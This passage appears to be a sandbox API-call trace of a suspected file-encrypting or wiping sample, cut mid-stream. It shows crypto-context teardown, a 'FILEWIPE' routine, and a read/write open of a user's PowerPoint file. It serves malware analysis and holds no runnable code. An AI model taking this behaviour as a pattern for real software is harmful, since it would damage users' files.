wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0033.061] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0033.061] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0033.061] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0033.061] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0033.061] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0033.062] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0033.062] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0033.062] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0033.062] PeekMessageW (in: lpMsg=0x6ae38c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae38c) returned 0 [0033.062] PeekMessageW (in: lpMsg=0x6ae38c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae38c) returned 0 [0033.062] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0033.062] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0033.062] PeekMessageW (in: lpMsg=0x6ae1c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae1c4) returned 0 [0033.062] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0033.062] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0033.062] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0033.064] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0033.064] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0033.064] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0033.065] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0033.065] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0033.065] CharUpperBuffW (in: lpsz="_CRYPT_DESTROYKEY", cchLength=0x11 | out: lpsz="_CRYPT_DESTROYKEY") returned 0x11 [0033.065] PeekMessageW (in: lpMsg=0x6aea4c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aea4c) returned 0 [0033.065] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0033.065] PeekMessageW (in: lpMsg=0x6ae3fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae3fc) returned 0 [0033.065] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0033.065] CryptDestroyKey (hKey=0x7c2280) returned 1 [0033.066] PeekMessageW (in: lpMsg=0x6aea4c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aea4c) returned 0 [0033.066] PeekMessageW (in: lpMsg=0x6aea4c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aea4c) returned 0 [0033.066] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0033.066] PeekMessageW (in: lpMsg=0x6ae7f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae7f4) returned 0 [0033.066] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0033.066] PeekMessageW (in: lpMsg=0x6ae59c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae59c) returned 0 [0033.066] PeekMessageW (in: lpMsg=0x6ae59c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae59c) returned 0 [0033.066] PeekMessageW (in: lpMsg=0x6ae7f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae7f4) returned 0 [0033.066] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0033.066] PeekMessageW (in: lpMsg=0x6ae3d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae3d4) returned 0 [0033.066] PeekMessageW (in: lpMsg=0x6ae7f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae7f4) returned 0 [0033.066] PeekMessageW (in: lpMsg=0x6ae7f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae7f4) returned 0 [0033.066] PeekMessageW (in: lpMsg=0x6aea4c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aea4c) returned 0 [0033.066] PeekMessageW (in: lpMsg=0x6aea4c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aea4c) returned 0 [0033.066] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0033.066] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0033.066] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0033.066] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0033.066] PeekMessageW (in: lpMsg=0x6ae8bc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae8bc) returned 0 [0033.066] PeekMessageW (in: lpMsg=0x6ae8bc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae8bc) returned 0 [0033.066] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0033.066] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0033.067] PeekMessageW (in: lpMsg=0x6ae6f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae6f4) returned 0 [0033.067] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0033.067] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0033.067] PeekMessageW (in: lpMsg=0x6ae6e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae6e4) returned 0 [0033.067] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0033.067] PeekMessageW (in: lpMsg=0x6ae6e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae6e4) returned 0 [0033.067] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0033.067] CryptReleaseContext (hProv=0x7d5b30, dwFlags=0x0) returned 1 [0033.067] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0033.067] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0033.067] PeekMessageW (in: lpMsg=0x6ae6e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae6e4) returned 0 [0033.067] FreeLibrary (hLibModule=0x754b0000) returned 1 [0033.067] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0033.067] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0033.067] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0033.068] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0033.069] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0033.069] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0033.069] CharUpperBuffW (in: lpsz="FILEWIPE", cchLength=0x8 | out: lpsz="FILEWIPE") returned 0x8 [0033.069] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0033.069] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0033.069] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\H3Wz1PxDd.pptx", lpFindFileData=0x6ae7a0 | out: lpFindFileData=0x6ae7a0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xbbb0c630, ftCreationTime.dwHighDateTime=0x1d59cf6, ftLastAccessTime.dwLowDateTime=0x859ca230, ftLastAccessTime.dwHighDateTime=0x1d58c43, ftLastWriteTime.dwLowDateTime=0x859ca230, ftLastWriteTime.dwHighDateTime=0x1d58c43, nFileSizeHigh=0x0, nFileSizeLow=0x70c8, dwReserved0=0x0, dwReserved1=0x777648, cFileName="H3Wz1PxDd.pptx", cAlternateFileName="H3WZ1P~1.PPT")) returned 0x7c2240 [0033.069] FindClose (in: hFindFile=0x7c2240 | out: hFindFile=0x7c2240) returned 1 [0033.069] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0033.069] CharLowerBuffW (in: lpsz="byte[28872]", cchLength=0xb | out: lpsz="byte[28872]") returned 0xb [0033.070] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0033.070] CharUpperBuffW (in: lpsz="MEMSET", cchLength=0x6 | out: lpsz="MEMSET") returned 0x6 [0033.070] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0033.070] CharLowerBuffW (in: lpsz="ptr:cdecl", cchLength=0x9 | out: lpsz="ptr:cdecl") returned 0x9 [0033.070] LoadLibraryW (lpLibFileName="msvcrt.dll") returned 0x76b40000 [0033.070] FreeLibrary (hLibModule=0x76b40000) returned 1 [0033.070] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af408 | out: hHeap=0x770000) returned 1 [0033.070] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5c8 | out: hHeap=0x770000) returned 1 [0033.070] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da178 | out: hHeap=0x770000) returned 1 [0033.070] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1af8 | out: hHeap=0x770000) returned 1 [0033.070] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1dc8 | out: hHeap=0x770000) returned 1 [0033.070] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af538 | out: hHeap=0x770000) returned 1 [0033.070] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc28 | out: hHeap=0x770000) returned 1 [0033.071] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c8b0 | out: hHeap=0x770000) returned 1 [0033.071] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889a90 | out: hHeap=0x770000) returned 1 [0033.071] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889670 | out: hHeap=0x770000) returned 1 [0033.071] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd60 | out: hHeap=0x770000) returned 1 [0033.071] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c9d0 | out: hHeap=0x770000) returned 1 [0033.071] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889a78 | out: hHeap=0x770000) returned 1 [0033.071] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c9b8 | out: hHeap=0x770000) returned 1 [0033.071] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc10 | out: hHeap=0x770000) returned 1 [0033.071] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889730 | out: hHeap=0x770000) returned 1 [0033.071] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd90 | out: hHeap=0x770000) returned 1 [0033.071] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889538 | out: hHeap=0x770000) returned 1 [0033.071] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889c10 | out: hHeap=0x770000) returned 1 [0033.071] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cec8 | out: hHeap=0x770000) returned 1 [0033.071] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c820 | out: hHeap=0x770000) returned 1 [0033.071] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab380 | out: hHeap=0x770000) returned 1 [0033.071] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c940 | out: hHeap=0x770000) returned 1 [0033.071] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8899a0 | out: hHeap=0x770000) returned 1 [0033.071] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cdf0 | out: hHeap=0x770000) returned 1 [0033.071] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc88 | out: hHeap=0x770000) returned 1 [0033.071] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb98 | out: hHeap=0x770000) returned 1 [0033.071] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b85a8 | out: hHeap=0x770000) returned 1 [0033.071] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da228 | out: hHeap=0x770000) returned 1 [0033.071] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0033.071] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0033.071] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0033.071] CharUpperBuffW (in: lpsz="_WINAPI_CREATEFILE", cchLength=0x12 | out: lpsz="_WINAPI_CREATEFILE") returned 0x12 [0033.071] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b45c8 | out: hHeap=0x770000) returned 1 [0033.071] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5e8 | out: hHeap=0x770000) returned 1 [0033.071] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0033.071] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0033.071] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0033.071] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0033.072] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0033.072] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0033.072] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0033.072] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0033.072] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0033.072] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0033.072] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0033.072] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2240 | out: hHeap=0x770000) returned 1 [0033.072] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0033.072] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0033.072] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0033.072] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0033.072] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0033.072] CharLowerBuffW (in: lpsz="handle", cchLength=0x6 | out: lpsz="handle") returned 0x6 [0033.072] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x76e10000 [0033.072] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\H3Wz1PxDd.pptx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\h3wz1pxdd.pptx"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x128 [0033.072] FreeLibrary (hLibModule=0x76e10000) returned 1 [0033.072] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da3a8 | out: hHeap=0x770000) returned 1 [0033.072] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da298 | out: hHeap=0x770000) returned 1 [0033.072] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2a8 | out: hHeap=0x770000) returned 1 [0033.072] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1f8 | out: hHeap=0x770000) returned 1 [0033.072] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1e8 | out: hHeap=0x770000) returned 1 [0033.073] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1d8 | out: hHeap=0x770000) returned 1 [0033.073] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da188 | out: hHeap=0x770000) returned 1 [0033.073] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1940 | out: hHeap=0x770000) returned 1 [0033.073] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd00 | out: hHeap=0x770000) returned 1 [0033.073] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1c8 | out: hHeap=0x770000) returned 1 [0033.073] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c9d0 | out: hHeap=0x770000) returned 1 [0033.073] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd60 | out: hHeap=0x770000) returned 1 [0033.073] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889a90 | out: hHeap=0x770000) returned 1 [0033.073] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889670 | out: hHeap=0x770000) returned 1 [0033.073] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc28 | out: hHeap=0x770000) returned 1 [0033.073] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c8b0 | out: hHeap=0x770000) returned 1 [0033.073] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c8c8 | out: hHeap=0x770000) returned 1 [0033.073] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc40 | out: hHeap=0x770000) returned 1 [0033.073] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c838 | out: hHeap=0x770000) returned 1 [0033.073] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8896a0 | out: hHeap=0x770000) returned 1 [0033.073] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cca0 | out: hHeap=0x770000) returned 1 [0033.073] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cef8 | out: hHeap=0x770000) returned 1 [0033.073] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce20 | out: hHeap=0x770000) returned 1 [0033.073] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c958 | out: hHeap=0x770000) returned 1 [0033.073] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c970 | out: hHeap=0x770000) returned 1 [0033.073] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8897c0 | out: hHeap=0x770000) returned 1 [0033.073] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c868 | out: hHeap=0x770000) returned 1 [0033.073] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889550 | out: hHeap=0x770000) returned 1 [0033.073] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd78 | out: hHeap=0x770000) returned 1 [0033.073] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889778 | out: hHeap=0x770000) returned 1 [0033.073] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c928 | out: hHeap=0x770000) returned 1 [0033.073] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ca30 | out: hHeap=0x770000) returned 1 [0033.073] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cce8 | out: hHeap=0x770000) returned 1 [0033.073] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8895c8 | out: hHeap=0x770000) returned 1 [0033.073] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889610 | out: hHeap=0x770000) returned 1 [0033.073] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cf10 | out: hHeap=0x770000) returned 1 [0033.073] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c7a8 | out: hHeap=0x770000) returned 1 [0033.073] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c988 | out: hHeap=0x770000) returned 1 [0033.073] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7d5b30 | out: hHeap=0x770000) returned 1 [0033.073] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da278 | out: hHeap=0x770000) returned 1 [0033.073] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0033.073] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0033.074] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0033.074] CharUpperBuffW (in: lpsz="_WINAPI_WRITEFILE", cchLength=0x11 | out: lpsz="_WINAPI_WRITEFILE") returned 0x11 [0033.074] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b45c8 | out: hHeap=0x770000) returned 1 [0033.074] HeapFree (in: hHeap=0x770000, dwFlags=0x0, 